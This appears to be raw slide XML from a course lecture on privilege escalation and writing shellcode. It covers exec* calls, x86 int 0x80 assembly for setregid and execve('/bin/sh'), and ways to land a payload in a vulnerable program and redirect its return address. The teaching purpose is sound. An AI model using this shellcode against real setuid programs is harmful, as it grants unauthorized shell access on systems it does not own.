              <a:rPr lang="en-US"/>
              <a:t> as current effective </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>gid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Privilege escalation!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> to unit3-level0-…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2073656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1393"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get_a_shell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154" y="4628972"/>
            <a:ext cx="10515600" cy="1549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/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, “arg0”, “arg1”, “arg2”, …, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”, 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[]);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5460A-4BD3-8645-8D6C-2E5533680839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948171" y="2375576"/>
            <a:ext cx="100765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err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“/bin/bash”, “bash”, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" i="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1"/>
              <a:t>Transform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> the process and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“/bin/bash” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>with arg0 as “bash”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7A6D6-E876-D048-B10A-F5C405A545C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678007" y="4444306"/>
            <a:ext cx="60942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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>family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288DEA-6DA7-53B7-A436-19B41C687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71" y="2375576"/>
            <a:ext cx="7039243" cy="4658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45AFA0-53E2-E5F2-DDDC-89D43D9B2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71" y="4905971"/>
            <a:ext cx="7039243" cy="105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95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677F47-1A03-1347-B0EF-D3479FF54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949" y="4543880"/>
            <a:ext cx="7076622" cy="15085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C3B0AD-9AAF-7D4A-8AEA-92A2EB846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950" y="2407331"/>
            <a:ext cx="6423479" cy="7059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67EBF1-B599-48A4-BD2D-C4C27AA4D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Calling </a:t>
            </a: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(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B06090202040302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B0066-A03D-4EC6-93DB-6B1576340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Return value will be stored in </a:t>
            </a:r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br>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US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</a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SYS_getegid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,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endParaRPr lang="en-US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</a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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/>
              <a:t>will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/>
              <a:t>hold the return value of </a:t>
            </a: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  <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B06090202040302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</a:rPr>
              <a:t>(</a:t>
            </a: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(), </a:t>
            </a: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())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>?</a:t>
            </a:r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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov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, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	     		// 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st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 err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov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, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      		// 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nd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 err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SYS_setregid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,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    // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> number</a:t>
            </a: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</a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $0x80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1720266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90913-FD0F-4A40-8BE6-4EF92915A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Calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve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C2953-1C98-4A14-A1E6-D4F586B5A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execve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(char* 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filepath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, char** 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argv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, char** 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envp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execve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(“/bin/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sh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”, NULL, NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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 = $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SYS_execve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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ebx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4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address of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="240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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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ecx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 = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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edx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 = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="240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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $0x80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2433130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822D-0CDA-4548-AE4A-FA2E5E23C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6475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Writing Shellcode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D2950-1BA7-42EF-8BA6-35750A5CD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000"/>
            <a:ext cx="10515600" cy="4628963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>System call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A function call to OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Eventual gateway to access system resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>File I/O</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Network I/O</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory allocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set/get permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Run program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Varies for different systems and architectures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884C238-BC4D-D74D-B518-65E42A2D0471}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5569560" y="528048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884C238-BC4D-D74D-B518-65E42A2D047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60200" y="5271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6344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Launch Shellcode?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i="1"/>
              <a:t>Land</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> your shellcode (payload) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>in the target program’s address space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Put it as a part of your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>input </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Put it as program’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Put it as program’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>environmental</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Put it as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>program’s name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>[0])</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:b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b="1" i="1"/>
              <a:t>Set the return address (control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:b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Run</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr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BA57FC-6A7B-2544-80BD-F60C614516CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2184400" y="4947335"/>
            <a:ext cx="6096000" cy="830997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lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setregid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getegid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getegid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”, 0, 0);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116341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C848-2397-41E6-AD8E-C17903814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Loading You Payload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7F235-77F4-4A09-ACCB-8876E1956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Leverages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>program inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Many sanitizations for their inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>E.g., how program cut string end?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Program will only accept</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ASCII characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Alphanumeric characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Limits in input length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>No escape characters …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720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06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AE1F53-95F2-EA41-B8CD-A7427A96A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39D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26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77508B-5027-BE4F-BF96-6574B2A07D23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1582505" y="1682859"/>
            <a:ext cx="61977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/>
              <a:t>Put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> number in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0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Set up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> 1 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> 2 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> 3 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consola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/>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>*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>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>System call runs. Result in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:cs typeface="Cambria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38E2878-CB13-ED45-B2A8-08A38DABEA88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
